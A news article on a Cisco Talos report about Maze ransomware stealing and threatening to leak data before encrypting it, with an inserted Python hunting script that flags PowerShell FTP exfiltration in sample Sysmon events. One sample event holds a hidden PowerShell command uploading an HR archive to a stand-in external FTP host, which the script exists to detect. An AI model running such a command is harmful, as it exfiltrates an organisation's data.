Encrypting data may no longer suffice for threat actors deploying ransomware.
Cisco Talos researchers saw a "dangerous" new trend of ransomware attacks combining data exposure to pressure victims into paying, according to the company's Threat Assessment Report. The report, which was published Wednesday, highlights incident response trends from last fall, as well as recent threat activity during the winter.
"Ransomware actors have begun exfiltrating sensitive data from victim organizations and threatening to publish them if the ransom is not paid," the report stated.
Matt Olney, director at Cisco Talos, said he is distressed but not surprised by this trend. "If you have access to data to encrypt it, then you have the same level of access to steal it, and it only makes sense it's something that would evolve," he said.
The report noted that Talos' incident response team observed two separate incidents this winter that combined ransomware with the threat of sensitive data exposure. Both involved the same threat actor, which Olney identified as the Maze ransomware group. The Maze operators used the penetration testing tool Cobalt Strike to move through the victims' networks and gather data, covertly exfiltrated the sensitive data to an FTP server using PowerShell, and only then deployed ransomware in the environments.
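The Maze intrusion chain described above (Cobalt Strike for lateral movement, PowerShell pushing data to an FTP server, ransomware deployed last) gives defenders a narrow but practical hunt: PowerShell should almost never be the process speaking FTP to an address outside the network. The following is an added example, not code from the Talos report or from Cisco; it runs two simple rules over constructed Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records. The sample events, user names, IP addresses and the allowlist of sanctioned internal FTP servers are all assumptions made up for the example.

```python
"""Hunt for PowerShell-driven FTP exfiltration in Sysmon-style events.

Added example with constructed sample data; not code or data from the Talos report.
Rule 1: powershell.exe launched with an FTP upload idiom on its command line.
Rule 2: powershell.exe opening a network connection to an FTP port.
"""
import ipaddress
import re
from dataclasses import dataclass

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (EventID 1 = ProcessCreate, 3 = NetworkConnect).
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2020-01-14 02:11:03", "Image": PS_IMAGE, "User": "CORP\\svc_backup",
     "CommandLine": "powershell.exe -nop -w hidden -c \"$c=New-Object System.Net.WebClient;"
                    "$c.UploadFile('ftp://203.0.113.7/out/hr.zip','C:\\staging\\hr.zip')\""},
    {"EventID": 3, "UtcTime": "2020-01-14 02:11:04", "Image": PS_IMAGE, "User": "CORP\\svc_backup",
     "DestinationIp": "203.0.113.7", "DestinationPort": 21},
    {"EventID": 3, "UtcTime": "2020-01-14 02:12:40", "Image": PS_IMAGE, "User": "CORP\\deploy",
     "DestinationIp": "10.20.0.5", "DestinationPort": 21},          # sanctioned internal FTP server
    {"EventID": 3, "UtcTime": "2020-01-14 02:12:55", "Image": PS_IMAGE, "User": "CORP\\deploy",
     "DestinationIp": "10.30.1.9", "DestinationPort": 21},          # internal but not sanctioned
    {"EventID": 3, "UtcTime": "2020-01-14 02:13:00", "User": "CORP\\alice",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "198.51.100.4", "DestinationPort": 443},      # benign browser traffic
    {"EventID": 1, "UtcTime": "2020-01-14 02:14:00", "Image": PS_IMAGE, "User": "CORP\\alice",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},      # benign PowerShell
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
FTP_PORTS = {20, 21, 990}  # FTP data, FTP control, implicit FTPS
# .NET and command-line idioms commonly used to push files over FTP from PowerShell.
FTP_CMDLINE = re.compile(r"ftp://|FtpWebRequest|UploadFile\(|\bftp\.exe\b", re.IGNORECASE)
# Hypothetical allowlist of sanctioned internal FTP hosts (assumption for the example).
ALLOWED_FTP_HOSTS = {ipaddress.ip_address("10.20.0.5")}
# RFC 1918 ranges checked explicitly; Python's is_private also covers documentation
# ranges such as 203.0.113.0/24, which would hide the sample "external" address.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass(frozen=True)
class Finding:
    utc_time: str
    user: str
    rule: str
    detail: str


def _is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in POWERSHELL_IMAGES


def _is_internal(ip_str: str) -> bool:
    ip = ipaddress.ip_address(ip_str)
    return any(ip in net for net in RFC1918)


def hunt_ftp_exfil(events):
    """Return a list of Finding records for PowerShell FTP activity."""
    findings = []
    for ev in events:
        if not _is_powershell(ev.get("Image", "")):
            continue
        if ev["EventID"] == 1:
            m = FTP_CMDLINE.search(ev.get("CommandLine", ""))
            if m:
                findings.append(Finding(ev["UtcTime"], ev["User"], "ps_ftp_cmdline", m.group(0)))
        elif ev["EventID"] == 3:
            port, dst = int(ev["DestinationPort"]), ev["DestinationIp"]
            if port not in FTP_PORTS or ipaddress.ip_address(dst) in ALLOWED_FTP_HOSTS:
                continue
            rule = "ps_ftp_internal_unsanctioned" if _is_internal(dst) else "ps_ftp_external"
            findings.append(Finding(ev["UtcTime"], ev["User"], rule, f"{dst}:{port}"))
    return findings


if __name__ == "__main__":
    for f in hunt_ftp_exfil(SAMPLE_EVENTS):
        print(f"{f.utc_time}  {f.user:<18} {f.rule:<30} {f.detail}")
```

The allowlist is what keeps this usable in practice: most environments have some sanctioned FTP, and a rule that fires on every internal transfer gets disabled within a week. The rule deliberately does not look at payload size or content, because the Maze chain described above used ordinary PowerShell and an ordinary FTP server, so the process-plus-destination pairing is the cheapest signal; it will not catch exfiltration over HTTPS or via a Cobalt Strike channel, which needs separate coverage.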
So far, Maze ransomware gang is the only group Talos has observed utilizing this combination. But if these attacks are successful, Olney said other groups may follow, especially if a victim appears more motivated by the threat of data exposure as opposed to a conventional ransomware attack.
The top malware threats for fall 2019 remained Trickbot and Ryuk, according to the report. However, Talos researchers observed threat actors using an unusual method to deploy Ryuk, which targeted Active Directory to spread ransomware rather than using PsExec.
"Active Directory is an incredibly powerful asset for malicious actors to control," Olney said. "It's a mapping of both users and Windows machines in a network. Even if you know nothing about a network, if you have access to Active Directory controllers, they'll be able to tell you everything you want to know, from a structural perspective, if not from a security perspective."
Once inside, threat actors gain access to administrator-level credentials and a list of every device on which they could deploy their malware. In addition to these new tactics, the Cisco Talos report said threat actors have also made advances in victim profiling.
"Generally, they have some understanding of where they are," Olney said. "They're in a new network environment every time they successfully breach someone, so in order to put that victim in a position where they will consider paying ransom, they have to get their ransomware up on a large number of machines. They must learn where the Active Directory servers are, how things are set up, avoid being detected and disable security controls."
Olney said there's no indication threat actors are targeting specific companies, but Talos has seen some indications that there are favored vertical industries, such as government, healthcare and manufacturing, which would suffer high costs from any downtime.
No matter the victim, these attacks take more time than the average ransomware attack and involve months of research and reconnaissance. Olney said such attacks typically start with a Trickbot or Emotet infection; several months later, after profiling the victim's systems, the threat actors use the knowledge and access they have gained to encrypt the target's systems on a large scale.
Maze's techniques are not especially sophisticated or new, Olney said; using a simple PowerShell script for data exfiltration is relatively straightforward, for example. "Threat actors are looking for easy access using the tools they already have," he said.
Olney said the trend of data shaming ransomware victims is most likely here to stay. "I would be surprised if we didn't see more of that this year," he said.
Other security researchers have already observed similar activity beyond the Maze ransomware group. For example, endpoint protection vendor Morphisec reported in December that a Zeppelin ransomware attack on one of its customers exfiltrated the company's backup data before encrypting its systems. While the threat actors in this case used ConnectWise Control, a remote desktop application, for the initial intrusion, they also used PowerShell and Cobalt Strike in the attack.
Morphisec CTO Michael Gorelik told SearchSecurity he anticipates the majority of ransomware attacks will include attempts to exfiltrate and potentially expose victims' data. "The goal is to steal the information now, not just encrypt it," he said.